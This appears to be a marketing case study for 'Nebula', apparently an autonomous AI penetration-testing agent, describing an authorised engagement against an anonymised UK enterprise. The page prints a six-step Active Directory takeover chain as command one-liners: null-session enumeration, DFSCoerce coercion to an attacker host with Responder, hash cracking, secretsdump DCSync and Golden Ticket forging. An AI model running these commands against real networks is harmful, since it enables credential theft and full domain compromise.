Skip to main content
Real Engagements

NEBULA IN THE WILD
How a Real Engagement Runs

Real Breachline engagements — how Nebula tested, the surfaces it covered, and the outcome. Client details are fully anonymised: no names, sectors, domains, IPs, or data.

1
Real Engagement
100+
Findings, Last Engagement
0
False Positives
24/7
Continuous Testing
The Challenge

What the client needed and where their tooling fell short.

What Nebula Did

The methodology and, where relevant, the proven exploit chain.

Areas Covered

The surfaces and categories tested, end to end.

Enterprise
UK Enterprise (anonymised)
Full-SpectrumWeb · Internal · ADBlack-BoxProven Exploits

Full-Spectrum Assessment — External, Web & Internal

We were asked to test a UK enterprise end to end: their public website, their external footprint, and a sizeable internal Windows and Linux estate running Active Directory. Nebula ran the whole engagement on its own and came back with more than 100 issues — every one backed by evidence.

100+
Findings
Across external, web & internal
3
Surfaces Tested
External · Web · Internal / AD
Domain
Admin Achieved
Full AD compromise, confirmed
0
False Positives
Every finding evidenced

The Challenge

Like a lot of fast-growing businesses, they'd outgrown their tooling. Scanners covered the obvious external surface, but nobody had taken a proper look at the internal network or Active Directory in a while. They didn't want another wall of CVSS numbers — they wanted to know what a real attacker could actually do, and what to fix first.

What Nebula Did

Nebula went in black-box, with no inside knowledge, and worked across all three fronts at once. It mapped the attack surface, picked the right specialist for each job, ran real offensive tooling in a throwaway sandbox, and stitched individual weaknesses into full attack paths. Nothing destructive — and every finding came with the proof to back it up.

1
External & OSINT

Mapped the public footprint, exposed services, and edge configuration from the outside in — zero prior knowledge.

2
Web Application

Authenticated and unauthenticated testing of the customer portal — auth, access control, injection, and business logic.

3
Internal & Active Directory

Assessed the internal Windows/Linux estate and AD — access, identity, segmentation, and privilege paths.

4
Prove & Report

Every finding validated with a real, non-destructive proof in a sandbox, scored with CVSS 4.0, and mapped to remediation.

Proof — Full Domain TakeoverConfirmed Executed

From a single low-privileged account — no admin rights — Nebula chained six real weaknesses into full Active Directory compromise, executed live and non-destructively on production.

1
Low-privileged footholdTA0001 · Initial Access

Started from a single low-privileged domain account on an internal segment — no administrative rights at the outset.

# low-privileged domain user · no admin rights
2
Anonymous enumerationT1087 · Account Discovery

An unauthenticated SMB null session on a domain controller returned the full domain user list — hundreds of accounts, with descriptions that flagged the privileged ones.

nxc smb <dc> -u '' -p '' --users → 490 domain users
3
Coercion → DC auth captureT1187 · Forced Authentication

DFSCoerce (MS-DFSNM) forced the domain controller’s machine account to authenticate to an attacker host; Responder captured its NetNTLMv1.

coercer coerce -t <dc> -l <atk> -u <low-priv> + responder → NetNTLMv1 of <dc>$
4
Machine-account hash recoveryT1110 · Credential Cracking

The NetNTLMv1 response (static challenge) was cracked to recover the domain controller’s machine-account NT hash.

NTLMv1 (static challenge) → crack → <dc>$ NT hash
5
Pass-the-hash DCSyncT1003.006 · DCSync

Pass-the-hash as the DC machine account ran a DCSync that pulled every domain account hash, including krbtgt — all reached from the low-privileged start.

impacket-secretsdump -hashes :<dc$-hash> <domain>/<dc>$@<dc> -just-dc → 7,820 hashes incl. krbtgt
6
Golden Ticket — validated liveT1558.001 · Golden Ticket

A Golden Ticket forged offline from the krbtgt AES256 key (unrotated ~10 years) was validated live against the production domain controller — full ADMIN$/C$/SYSVOL access — then deleted per cleanup rules.

ticketer.py -aesKey <krbtgt> + smbclient.py -k -no-pass <dc> → Domain Admin on production DC

Executed live on production (2026-05-14) from a single low-privileged account — no admin credentials at the start. The coercion → hash-recovery → pass-the-hash DCSync chain ran in about a minute (~15:00 BST); the Golden Ticket was forged and validated live against the production domain controller (11:12 BST), then deleted with no persistent artefacts. All identifiers (domain, hosts, IPs, accounts) are masked.

Areas Covered

Web Application

Authentication, access control, injection, and multi-step business-logic testing.

Active Directory & Identity

Anonymous access, coercion surfaces, account hygiene, and privilege paths.

Network & Exposed Services

Open ports, cleartext protocols, unauthenticated data stores, and management interfaces.

Sensitive Data Exposure

Over-permissive files and logs containing sensitive operational data.

Hardening & Patch Hygiene

Password policy, end-of-life software, security headers, and misconfiguration.

External Footprint

Edge/WAF bypass exposure, header gaps, and information disclosure.

The full engagement produced 100+ findings with reproducible proof-of-concept steps, CVSS 4.0 scoring, and remediation mapped to OWASP, PCI-DSS, ISO 27001, and NIST — delivered as a board- and auditor-ready report.

See What Nebula Finds in Your Infrastructure

Nebula starts with zero knowledge and attacks from the outside in — across web, mobile, cloud, APIs, internal networks, and infrastructure. Every finding is real, exploitable, and proven.